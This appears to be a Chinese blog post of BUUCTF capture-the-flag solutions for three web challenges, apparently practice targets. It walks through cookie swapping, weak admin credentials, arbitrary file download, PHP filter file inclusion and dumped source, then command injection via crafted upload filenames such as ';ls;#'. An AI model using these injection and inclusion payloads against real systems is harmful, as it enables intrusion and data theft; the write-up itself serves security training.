buuctf刷题记录
- 游戏开发
- 2025-09-01 03:45:01
[watevrCTF-2019]Cookie Store
直接替换cookie
[GKCTF 2021]easycms目录扫描后台地址/admin.php 弱口令:admin/12345
漏洞利用一任意文件下载![[Pasted image 20250217183203.png]] 复制文件下载链接
admin.php?m=ui&f=downloadtheme&theme=L3Zhci93d3cvaHRtbC9zeXN0ZW0vdG1wL3RoZW1lL2RlZmF1bHQvMS56aXA=解码后面base64编码的字符串 ![[e619c089eeb34db9b392b2b4f8d6552a.png]] 发现可以下载文件 尝试替换为/flag ![[Pasted image 20250217183559.png]] ![[Pasted image 20250217183620.png]] 成功下载
[N1CTF 2018]eating_cms扫描目录发现register.php 注册登录进去发现文件包含漏洞
php://filter/convert.base64-encode/resource=registerregister.php
<?php require_once "function.php"; if($_POST['action'] === 'register'){ if (isset($_POST['username']) and isset($_POST['password'])){ $user = $_POST['username']; $pass = $_POST['password']; $res = register($user,$pass); if($res){ Header("Location: index.php"); }else{ $errmsg = "Username has been registered!"; } } else{ Header("Location: error_parameter.php"); } } if (!$_SESSION['login']) { include "templates/register.html"; } else { Header("Location : user.php?page=info"); } ?>function.php
<?php session_start(); require_once "config.php"; function Hacker() { Header("Location: hacker.php"); die(); } function filter_directory() { $keywords = ["flag","manage","ffffllllaaaaggg"]; $uri = parse_url($_SERVER["REQUEST_URI"]); parse_str($uri['query'], $query); // var_dump($query); // die(); foreach($keywords as $token) { foreach($query as $k => $v) { if (stristr($k, $token)) hacker(); if (stristr($v, $token)) hacker(); } } } function filter_directory_guest() { $keywords = ["flag","manage","ffffllllaaaaggg","info"]; $uri = parse_url($_SERVER["REQUEST_URI"]); parse_str($uri['query'], $query); // var_dump($query); // die(); foreach($keywords as $token) { foreach($query as $k => $v) { if (stristr($k, $token)) hacker(); if (stristr($v, $token)) hacker(); } } } function Filter($string) { global $mysqli; $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password"; $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><"; for ($i = 0; $i < strlen($string); $i++) { if (strpos("$whitelist", $string[$i]) === false) { Hacker(); } } if (preg_match("/$blacklist/is", $string)) { Hacker(); } if (is_string($string)) { return $mysqli->real_escape_string($string); } else { return ""; } } function sql_query($sql_query) { global $mysqli; $res = $mysqli->query($sql_query); return $res; } function login($user, $pass) { $user = Filter($user); $pass = md5($pass); $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'"; echo $sql; $res = sql_query($sql); // var_dump($res); // die(); if ($res->num_rows) { $data = $res->fetch_array(); $_SESSION['user'] = $data[username_which_you_do_not_know]; $_SESSION['login'] = 1; $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too]; return true; } else { return false; } return; } function updateadmin($level,$user) { $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' "; echo $sql; $res = sql_query($sql); // var_dump($res); // die(); // die($res); if ($res == 1) { return true; } else { return false; } return; } function register($user, $pass) { global $mysqli; $user = Filter($user); $pass = md5($pass); $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')"; $res = sql_query($sql); return $mysqli->insert_id; } function logout() { session_destroy(); Header("Location: index.php"); } ?>config.php
<?php error_reporting(E_ERROR | E_WARNING | E_PARSE); define(BASEDIR, "/var/ /html/"); define(FLAG_SIG, 1); $OPERATE = array('userinfo','upload','search'); $OPERATE_admin = array('userinfo','upload','search','manage'); $DBHOST = "localhost"; $DBUSER = "root"; $DBPASS = "Nu1LCTF2018!@#qwe"; //$DBPASS = ""; $DBNAME = "N1CTF"; $mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME); if(mysqli_connect_errno()){ echo "no sql connection".mysqli_connect_error(); $mysqli=null; die(); } ?>blog.csdn.net/weixin_43536759/article/details/106785187 //user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php if (FLAG_SIG != 1){ die("you can not visit it directly"); }else { echo "you can find sth in m4aaannngggeee"; } ?>m4aaannngggeee.php
<?php if (FLAG_SIG != 1){ die("you can not visit it directly"); } include "templates/upload.html"; ?>访问templates/upload.html ![[3065660-20241014144510436-64347080.png]] upllloadddd.php
<?php $allowtype = array("gif","png","jpg"); $size = 10000000; $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/"; $filename = $_FILES['file']['name']; if(is_uploaded_file($_FILES['file']['tmp_name'])){ if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){ die("error:can not move"); } }else{ die("error:not an upload file!"); } $newfile = $path.$filename; echo "file upload success<br />"; echo $filename; $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0"); echo "<img src='data:image/png;base64,".$picdata."'></img>"; if($_FILES['file']['error']>0){ unlink($newfile); die("Upload file error: "); } $ext = array_pop(explode(".",$_FILES['file']['name'])); if(!in_array($ext,$allowtype)){ unlink($newfile); } ?>![[3065660-20241014144514660-375299453.png]]
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");;ls;# ![[Pasted image 20250217203043.png]]
;cd …;ls;# ![[3065660-20241014144518805-1607377507.png]]
buuctf刷题记录由讯客互联游戏开发栏目发布,感谢您对讯客互联的认可,以及对我们原创作品以及文章的青睐,非常欢迎各位朋友分享到个人网站或者朋友圈,但转载请说明文章出处“buuctf刷题记录”
